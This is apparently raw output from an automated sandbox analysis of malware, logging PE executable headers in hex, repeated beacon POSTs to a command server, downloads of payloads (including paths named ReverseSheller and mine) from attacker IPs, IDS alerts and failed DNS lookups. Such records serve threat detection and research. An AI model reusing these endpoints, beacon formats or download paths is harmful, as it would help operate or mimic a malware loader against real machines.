00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 f4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:26 GMTContent-Type: application/octet-streamContent-Length: 1813504Last-Modified: Mon, 10 Feb 2025 16:18:45 GMTConnection: keep-aliveETag: "67aa26e5-1bac00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 a0 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 47 00 00 04 00 00 ac 71 1c 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 73 75 70 6e 70 6d 00 c0 1a 00 00 c0 2c 00 00 ba 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6a 78 75 69 62 76 77 00 20 00 00 00 80 47 00 00 04 00 00 00 86 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 47 00 00 22 00 00 00 8a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:56 GMTContent-Type: application/octet-streamContent-Length: 2155008Last-Modified: Tue, 11 Feb 2025 17:11:35 GMTConnection: keep-aliveETag: "67ab84c7-20e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 51 4b 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ad 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 70 74 66 73 68 65 00 30 1a 00 00 90 31 00 00 24 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 67 6f 62 61 66 74 6d 00 10 00 00 00 c0 4b 00 00 04 00 00 00 bc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 c0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:56 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/748049926/k6Sly2p.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 33 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075350001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 34 38 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075489001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 34 39 30 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075490021&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075509001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075510001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075511001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/none/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075512001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075513001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075514001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/748049926/k6Sly2p.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Tue, 11 Feb 2025 14:56:33 GMTIf-None-Match: "67ab6521-249e00"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075515001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7244183739/L5shRfh.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075516001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075517001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6158422886/r7MRNUY.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 37 35 35 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1075518001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075519001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5765828710/ViGgA8C.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.75 185.215.113.75

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49790 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49819 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49891 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49907 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49916 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49921 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49927 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49934 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49945 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49957 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49954 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49964 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49972 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49976 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49980 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49988 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49995 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50008 -> 172.67.128.154:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50020 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50047 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50062 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50065 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50067 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50070 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50074 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50075 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50076 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50071 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50072 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50077 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50078 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50080 -> 185.215.113.75:80

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: impolitewearr.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: suggestyuoz.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: edcatiofireeu.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: toppyneedus.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pleasedcfrown.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hoursuhouy.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mixedrecipew.biz replaycode: Name error (3)
